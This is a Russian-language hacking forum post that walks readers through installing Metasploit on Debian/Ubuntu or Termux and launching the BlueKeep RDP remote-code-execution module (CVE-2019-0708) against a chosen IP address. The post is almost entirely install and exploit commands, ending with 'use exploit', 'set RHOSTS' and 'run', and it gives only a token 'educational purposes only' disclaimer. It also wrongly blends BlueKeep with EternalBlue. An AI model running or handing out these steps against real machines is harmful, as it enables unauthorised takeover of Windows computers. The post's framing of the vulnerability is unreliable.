Статья Новый эксплойт угрожает Windows, метод взлома ПК - userLAND

cyberwolf

Модератор
Команда форума
05.12.2019
8
9
Каждый хакер и линуксоид знает об уязвимости EternalBlue, это крайне опасный эксплойт, который позволяет получить доступ к компьютеру на ОС Windows. Недавно был опубликован модуль для Metasploit - BlueKeep, который позволяет выполнить произвольный код на компьютере жертвы.
Сегодня мы узнаем, как использовать модуль bluekeep для metasploit-framework.

1. Исходный код уязвимости был опубликован несколько дней назад, поэтому нам необходимо воспользоватся git'ом.

Устанавливаем git:

Deb/Ubuntu:

sudo apt install git

Termux (запуск не гарантирован, необходимо использовать userLAND):

apt install git

Устанавливаем зависимости:

Deb/Ubuntu:

sudo apt update && sudo apt install -y git autoconf build-essential libpcap-dev libpq-dev zlib1g-dev libsqlite3-dev

Termux:

apt update && apt install -y git autoconf build-essential libpcap-dev libpq-dev zlib1g-dev libsqlite3-dev

Клонируем репозиторий (файл очень большой, 400+МБ):

git clone https://github.com/rapid7/metasploit-framework.git

2. Переходим в директорию:

cd metasploit-framework

3. Устанавливаем зависимости языка ruby:

sudo gem install bundler -v 1.17.3

bundler install

Если у вас произошли проблемы с установкой, выполните:

sudo apt-get install build-essential patch ruby-dev zlib1g-dev liblzma-dev

bundler install

------------------------------
Готово! Мы установили msf!

Запускаем msf:

./msfconsole

Далее выполняем

use exploit/rdp/cve_2019_0708_bluekeep_rce

set RHOSTS <ip>

run

Готово! Теперь вы умеете использовать эту уязвимость.
ИСПОЛЬЗУЙТЕ ЭТУ УЯЗВИМОСТЬ ТОЛЬКО В УЧЕБНЫХ ЦЕЛЯХ
 
Последнее редактирование модератором:
  • Like
Реакции: root